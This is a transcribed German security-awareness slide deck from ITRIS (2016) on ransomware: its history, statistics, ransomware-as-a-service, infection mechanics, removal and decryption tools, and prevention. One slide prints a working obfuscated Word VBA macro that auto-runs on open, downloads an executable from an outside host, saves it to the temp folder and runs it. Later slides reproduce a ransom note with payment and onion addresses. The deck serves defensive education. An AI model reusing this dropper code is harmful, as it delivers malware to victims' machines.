die dunkle Seite der Macht

Transcription

Die Spezialisten.
Meister auf Ihrem Gebiet.
Matthias Hirsch
Ransomware – die dunkle Seite der Macht
Der Reihe nach…









1996
2006
2010
2011
2012
2013
2014
2015
Februar 2016

März 2016

April 2016
© by ITRIS 2016
Prof. Moti Yung und Adam L. Young (Columbia Universität) dokumentieren Ransomware
taucht das erste Mal eine "Ransomware" auf ("GTOP")
Umfrage zu Ransomeware: ein Viertel aller 3'000 Befragten würde Lösegeld zahlen…
Ransomware taucht in Varianten auf
über 16 kriminelle "Gangs" entwickeln und verbreiten Ransomware
Erste Variante der CryptoWall Ransomware wird entdeckt
über 8.8 Millionen Attacken
TOX Toolkit online verfügbar / Ransomware FakeBsod verteilt sich / CryptoWall Attacken
Locky infiziert über 17'000 Rechner innert 24h in Deutschland
(im weiteren Verlauf steigt die Zahl auf über 5'000 Rechner pro Stunde!)
Ransomware "KeRanger" auf Mac OSX / TeslaCrypt 4.0 aufgetaucht / Surprise
(Verbreitung über TeamViewer) entdeckt / Petya verbreitet sich über Dropbox
Ransomware SAMSAM entdeckt (nutzt Exploit-Kit)
Quelle: https://blog.fortinet.com/post/cryptowall-another-ransomware-menace / https://blog.fortinet.com/post/new-cryptowall-variant-in-the-wild
http://www.heise.de/security/meldung/Erpresser-ruesten-nach-Verschluesselungs-Trojaner-TeslaCrypt-4-0-gesichtet-3145559.html
Seite 2
Microsoft Malware-Statistik
Top 10 Ransomware November 2015
© by ITRIS 2016
Quelle: https://www.microsoft.com/security/portal/mmpc/shared/ransomware.aspx
Fortinet Malware-Statistik
Top 3 Ransomware Februar 2016
(18.6 Millionen Infizierungen!)
Quelle: http://blog.fortinet.com/post/cryptowall-teslacrypt-and-locky-a-statistical-perspective
Seite 3
© by ITRIS 2016
Quelle: Trendmicro
Seite 4
"Kriegsschauplatz"


Februar 2016
Februar 2016

Februar 2016

März 2016
Ergebnis
 2015
 2016
© by ITRIS 2016
Spital "Hollywood Presbyterian Medical Center", Los Angeles zahlt 40 Bitcoins (ca. €15k)
Lukasklinik, Neuss über 3 Tage IT Betrieb lahmgelegt
(zwei weitere Krankenhäuse in Nordrhein-Westfalen betroffen)
Locky infiziert über 17'000 Rechner innert 24h in Deutschland
(im weiteren Verlauf steigt die Zahl auf über 5'000 Rechner pro Stunde!)
Bayrische Behörde mit über 1' 900MA / über 1 Million Dateien verschlüsselt
Schaden: ca. EUR 500'000
Laut Aufzeichnungen des FBI wurden 2015 über 18 Millionen US Dollar erpresst
über 300 Millionen US Dollar Erpressungsgeld prognostiziert
Quelle: http://www1.wdr.de/cyberangriff-lukaskrankenhaus-neuss-100.html / https://blog.botfrei.de/2015/06/krypto-trojaner-schaeden-gehen-in-die-millarden/
Seite 5
Die dunkle Seite der Macht…
E-Mail mit Anhang
Kompromittierte Webseite
Die "Verführung"…
Sicherheitsleck
"Honeypot"-Applikation
© by ITRIS 2016
Seite 6
Wofür steht "Ransomware"
 Ransom… = Lösegelt (to ransom = freikaufen)
 …ware
= Abkürzung für "Malware" (= Schadsoftware)
"Ransomware-as-a-Service" (RaaS)
 Serviceplattform für Ransomware
(z.B. "TOX" => Botnetz) seit 05/2015
 Analysieren von Endgeräten
 Generieren von RSA Schlüssel
mit autom. Austausch
 Autom. Abrechnung mit Nutzer
 Oft wechselnde Domänen
SDK …
 http://utkusen.com/en/projects.html
 https://malwr.com
 Hidden-Tear
© by ITRIS 2016
Quelle: http://thehackernews.com/2015/05/ransomware-creator.html / https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us/
Seite 7
So entsteht ein Ransomware-Trojaner
1. Als Benutzer bei einem RaaS Anbieter
mit Bitcoin-Wallet Adresse anmelden
2. Malware Service "buchen"
3. Ransomware im GUI definieren
4. Gewünschtes Format herunterladen
und verbreiten
… fertig!
© by ITRIS 2016
Quelle: http://arstechnica.com/security/2016/01/researchers-uncover-javascript-based-ransomware-as-service/
Seite 8
Wie funktioniert Ransomware?
Allgemeines
 Office Programme => Ausführung von Makros
 Angriff wird über WebServer ("BotNetz")gesteuert…
in Microsoft Office
 Doch wie wird der Server erreichbar?
 => die URL ist nicht im Klartext ersichtlich - sondern…
 Zugriff wird aus Makro (z.B. VBA) dynamisch zusammengebaut
(z.B. als Array mit Zahlenwerten, die einzeln in Buchstaben und in Folge in eine komplexe URL als
Zeichenkette zusammengebaut werden)
 URL wechseln sehr rasch die Domäne
d.h. es ist schwierig den WebServer der Ransomware steuert ausfindig machen zu können
via E-Mails
 wird gerne JavaScript verwendet… und auch dort nach gleichem Prinzip
die URL erst dynamisch erstellt um den Zugriff nicht erkennbar zu machen…
© by ITRIS 2016
Seite 9
Aufbau und Wirkungsweise
 Macro / VBA / VBSCRIPT / JavaScript erstellt dynamischen
Aufruf einer URL
 Aufruf der URL agiert als Trojaner und ermöglicht Transfer
des eigentlichen Virus in das lokale System
 Ransomware Virusprogramm aktiviert sich durch Einträge
in der Registry an verschiedenen Stellen
 Spätestens nach einem Neustart wird der Virus aktiv
 Verschlüsselung basiert nach dem Prinzip von RSA / PGP
(Interaktion mit Webserver für Schlüsselaustausch)
 Datenverschlüsselung läuft…
Beispiel für Trojaner in VBscript
Sub sampler()
Dim prunella As Variant
Dim dabchick As String
Dim misogynous As Long
immobility
remover.torment
End Sub
Sub immobility()
Dim sparsim As Object
Dim playpen As String
Dim beech As String
demonstrating = "seam.exe"
suffragist = Mid("meanwhileExexemplification", 10, 2) + Left("pandEnantiquated", 6) + "vironmentStrings"
Dim nacimiento As String
Set hardy = VBA.CreateObject(Right("epimediumWScr", 4) + "ipt.She" + Mid("flatllboom", 5, 2) + "")
matriculation = 45 + 89 - 72
lysis = 50 + 38
If matriculation + lysis > 96 Then
womanly = Left("genwellformed", 3) + "otypi" + "cal" + ""
End If
playpen = CallByName(hardy, suffragist, 1, "%temp%")
scapulary = 109 - 127 + 93
oneeyed = 94 - 26
If scapulary + oneeyed> 50 Then
comptes = StrReverse("as") + Right("coddlecre", 3) + "" + Mid("enormousbrigandage", 9,
0)
End If
beech = playpen & "\pteaparty" & demonstrating
Set carunculate = remover.clanger
commanding = #8:34:50 AM#
stuccco = Hour(commanding)
beneplacito = remover.mastitis(carunculate, beech)
unreasoning = #7:48:11 PM#
tinamou = Hour(unreasoning)
poorwill = 3 + 57
academician = 104 - 3 - 33
If poorwill + academician > 21 Then
blatherskite = "ash" + "toret" + "h"
End If
cityx = CallByName(hardy, "Run", VbMethod, beech)
End Sub
Sub AutoOpen()
ambystomatidae = #8:29:22 PM#
sordes = Hour(ambystomatidae)
sampler
End Sub
Public Function flirting() As String
Dim yarmulke As Variant
Dim forge As Object
Dim incivism As Integer
flirting = ActiveDocument.BuiltInDocumentProperties("Author")
End Function
Function clanger()
On Error Resume Next
atticus = "Ms" + "xml2." + Mid("backhandedXMLHTTPnational", 11, 7) + Right("ceremoniousness", 0)
Set clanger = CreateObject(atticus)
cartes = StrReverse("TEG")
aegilops = CallByName(clanger, "open", VbMethod, cartes, "http://iamthewinnerhere.com/80.exe", False)
affixed = 114 + 12 - 68
appertain = 72 - 15
If affixed + appertain > 83 Then
auxetic = StrReverse("me") + Mid("exemplarbiotocidaearilus", 9, 10)
End If
clanger.send
GoTo ampleness
cortical:
clanger = 0
ampleness:
End Function
Function mastitis(vespula, amazement)
cola = 62 - 61
belonidae = remover.flirting
cryostat = Left(belonidae, 2)
atticus = cryostat + "o" + "db" + ".Str" + Right("unpremeditatedeam", 3) + Left("savory", 0)
Set buccaneer = CreateObject(atticus)
noncombining = CallByName(buccaneer, "Open", VbMethod)
buccaneer.Type = 15 - 14
aegilops = CallByName(buccaneer, "Wr" + StrReverse("eti") + "" + Right("freeze", 0), cola, vespula.responseBody)
neologic = 43 + 7
categorical = 97 - 40 + 22
If neologic + categorical > 70 Then
disguised = "ac" + "ting"
End If
normative = CallByName(buccaneer, "Sav" + "eToFi" + Right("acescentle", 2), VbMethod, amazement, 124 - 123)
End Function
© by ITRIS 2016
Quelle: https://gist.githubusercontent.com/anonymous/1de693b39d974fc3708f/raw/18a29d823d8d9191ebca689e2ec9669b2575f5eb/newcwcs1
Seite 10
© by ITRIS 2016
Seite 11
Bitcoin – Renaissance einer elektronischen "OpenSource Währung"
 Anerkanntes Zahlungsmittel (EURO)
 Kauf und Verkauf erfolgt via SEPA Überweisung
(Single Euro Payments Area)
 Bitcoin-Wallet Adresse ist Basis
 Identifizierung der Handelspartner ist nicht möglich
 Anonymität ist aber auch nicht garantiert
Vereinfacht ausgedrückt:
© by ITRIS 2016
Quelle: https://bitcoinblog.de/2016/04/22/dunkel-dunkler-internet/ / https://bitcoin.org/de/
Seite 12
© by ITRIS 2016
Quelle: https://blog.fortinet.com/post/threat-intelligence-sharing-at-work-cyber-threat-alliance-tracks-cryptowall-version-3 / http://cyberthreatalliance.org/cryptowall-dashboard.html
Seite 13
© by ITRIS 2016
Seite 14
Nun zur Live-Demo… 
© by ITRIS 2016
Seite 15
© by ITRIS 2016
Seite 16
Wie zeigt sich das "Ergebnis" …
Bildinhalt
Verzeichnisinhalt
© by ITRIS 2016
Seite 17
What's the matter with your files?
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
NOT YOUR LANGUAGE? USE https://translate.google.com
Your data was secured using a strong encryption with RSA4096.
Use the link down below to find additional information on the encryption keys using
RSA-4096 https://en.wikipedia.org/wiki/RSA_(cryptosystem)
What exactly that means?
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
It means that on a structural level your files have been transformed.
You won't be able to use , read , see or work with them anymore .
In other words they are useless, however, there is a possibility
to restore them with our help.
What exactly happened to your files ???
*** Two personal RSA-4096 keys were generated for your PC/Laptop;
one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key,
which you received over the web .
*** In order to decrypt your data and gain access to your computer you
need a private key and a decryption software, which can be found
on one of our secret servers.
© by ITRIS 2016
It means that on a structural level your files have been transformed . You won't be able to use , read , see or work with them anymore .
In other words they are useless , however , there is a possibility to restore them with our help .
*** Two personal RSA-4096 keys were generated for your PC/Laptop; one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key , which you received over the web .
*** In order to decrypt your data and gain access to your computer you need a private key and a decryption software,
which can be found on one of our secret servers.
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
What should you do next ?
There are several options for you to consider :
*** You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or
*** You can start getting BitCoins right now and get access to your data quite fast .
In case you have valuable files , we advise you to act fast as there is no other option rather
than paying in order to get back your data.
In order to obtain specific instructions , please access your personal homepage by choosing one of the few addresses down below :
http://as3ws.fopyirr.com/E0363558AE894DAA
http://o4dm3.leaama.at/E0363558AE894DAA
http://i5ndw.titlecorta.at/E0363558AE894DAA
If you can't access your personal homepage or the addresses are not working, complete the following steps:
*** Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en
*** Install TOR Browser and open TOR Browser
*** Insert the following link in the address bar: xzjvzkgjxebzreap.onion/E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
***************IMPORTANT*****************INFORMATION********************
Your personal homepages
Your personal homepage Tor-Browser xzjvzkgjxebzreap.onion/E0363558AE894DAA
Your personal ID E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
Seite 18
What should you do next?
*** You can wait for a while until the price of a private key will raise,
so you will have to pay twice as much to access your files or
In case you have valuable files , we advise you to act fast as there is no other
option rather than paying in order to get back your data.
In order to obtain specific instructions , please access your personal homepage by choosing one
of the few addresses down below:
If you can't access your personal homepage or the addresses are not working,
complete the following steps:
**************IMPORTANT*****************INFORMATION********************
© by ITRIS 2016
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
NOT YOUR LANGUAGE? USE https://translate.google.com
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
It means that on a structural level your files have been transformed . You won't be able to use , read , see or work with them anymore .
In other words they are useless , however , there is a possibility to restore them with our help .
*** Two personal RSA-4096 keys were generated for your PC/Laptop; one key is public, another key is private.
*** All your data and files were encrypted by the means of the public key , which you received over the web .
*** In order to decrypt your data and gain access to your computer you need a private key and a decryption software,
which can be found on one of our secret servers.
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
What should you do next ?
*** You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or
In case you have valuable files , we advise you to act fast as there is no other option rather
than paying in order to get back your data.
In order to obtain specific instructions , please access your personal homepage by choosing one of the few addresses down below :
If you can't access your personal homepage or the addresses are not working, complete the following steps:
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
***************IMPORTANT*****************INFORMATION********************
Your personal homepage Tor-Browser xzjvzkgjxebzreap.onion/E0363558AE894DAA
Your personal ID E0363558AE894DAA
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
;>8-.5;7+ 6#6*:368)",27(4615&18
Seite 19
Was tun bei Befall
 Feststellen, von welcher Ransomware man betroffen ist:
https://id-ransomware.malwarehunterteam.com/index.php?lang=de_DE
Anleitungen um bislang bekannte Ransomware zu entfernen








.Lock
Cerber
JigSaw
Locky
Maktub
Petya
SamSam
Teslacrypt
© by ITRIS 2016
http://howtoremove.guide/lock-file-virus-removal/
http://howtoremove.guide/cerber-ransomware-virus-removal/
http://howtoremove.guide/jigsaw-ransomware-virus-removal/
http://howtoremove.guide/locky-virus-ransomware-file-removal/ & http://nabzsoftware.com/types-of-threats/locky-file
http://howtoremove.guide/maktub-locker-virus-ransomware-removal/
http://howtoremove.guide/petya-ransomware-virus-removal/
http://howtoremove.guide/samsam-ransomware-removal/
http://howtoremove.guide/teslacrypt-4-0-virus-ransomware-removal/
Seite 20
Software um Ransomware zu entfernen

ESET Rogue Application Remover verwenden um Ransomware zu entfernen
32-bit Version – http://download.eset.com/special/ERARemover_x86.exe
64-bit Version – http://download.eset.com/special/ERARemover_x64.exe



EU-Cleaner (https://www.botfrei.de/eucleaner.html)
Malwarebytes Anti-Malware (https://www.malwarebytes.org/mwb-download/)
Microsoft Windows Malicious Software Removal Tool verwenden
(https://www.microsoft.com/en-us/download/malicious-software-removal-tool-details.aspx)

SpyHunter
© by ITRIS 2016
(http://bugfighter.enigma.revenuewire.net/spyhunter2/download/)
Quelle: http://www.chip.de/news/Erpresser-Trojaner-bekaempfen-Schutz-und-Entfernen-von-Ransomware_92035897.html / http://malwarefixes.com/remove-cryptowall-ransomware/
Seite 21
Welche Ransomware kann entschlüsselt werden?
Zuerst: Ransomware Prozess stoppen (Taskmanager via STRG+ALT+DEL aufrufen und Prozess stoppen)
 AutoLocky
Emsisoft Decrypter for AutoLocky
 Bitcryptor
Kaspersky Ransomware Decryptor (https://noransom.kaspersky.com/)
 JigSaw
JigSawDecrypter (https://download.bleepingcomputer.com/demonslay335/JigSawDecrypter.zip)
 Petya
Bitdefender Petya Vaccine (http://download.bitdefender.com/am/cw/BDAntiRansomwareSetup.exe)
oder/und
Petya Sector Extractor (http://www.chip.de/downloads/Petya-Sector-Extractor_92236730.html)
 TeslaCrypt
TeslaDecoder (http://download.bleepingcomputer.com/BloodDolly/TeslaDecoder.zip)
 …?
Weitere Hilfsprogramme um von Ransomware verschlüsselte Daten wieder herzustellen:
 Panda Ransomware Decrypt (http://www.pandasecurity.com/resources/tools/pandaunransom.exe)
 SARDU (http://www.sarducd.it/de/index.html)
 TALOS (http://www.talosintel.com/teslacrypt_tool/)
 Trendmicro Anti-Ransomware Tool (https://esupport.trendmicro.com/en-us/home/pages/technical-support/1105975.aspx)
© by ITRIS 2016
Quelle: http://www.chip.de/news/Erpresser-Trojaner-bekaempfen-Schutz-und-Entfernen-von-Ransomware_92035897.html
Seite 22
Prävention
Sandbox
Antispam
Patchmanagement / Updates
Antivirenschutz
EXTERN
INTERN
Antivirenschutz
Application-Control
© by ITRIS 2016
Datensicherung
Schwachstellen-Analyse
Seite 23
Prävention
 Organisatorisch
 Regelmässig über aktuelle Bedrohungen (verständlich) informieren
 Mitarbeiter sensibilisieren (Training)

Technisch







Windows / Mac OSX Updates regelmässig installieren
Scan-Engine des Antivirenschutz regelmässig aktualisieren / bei Mac OSX "Xprotect" aktualisieren
Einstellungen zum Antivirenschutz nach Herstellervorgaben nachführen
Application-Control auf dem Gateway in Betracht ziehen
Spamfilter-Einstellungen anpassen
Regelmässige Komplettsuche auf Endgeräte und Server durchführen
System-Imaging und Datensicherung regelmässig kontrollieren, Konzept überprüfen
und Wiederherstellungsvorgänge durchführen
 Schwachstellen-Analyse zur IT Infrastruktur durchführen lassen
© by ITRIS 2016
Seite 24
Fragen?
Kontakt: www.itris.ch
© by ITRIS 2016
Seite 25

die dunkle Seite der Macht

Transcription

Similar documents

Ransomware - Eicar.com

Präsentation

vollständiger Artikel - Deutsche Gesellschaft für

Bedienungsanleitung IMPERIAL® HD 6i Twin

personenwaage kern mpd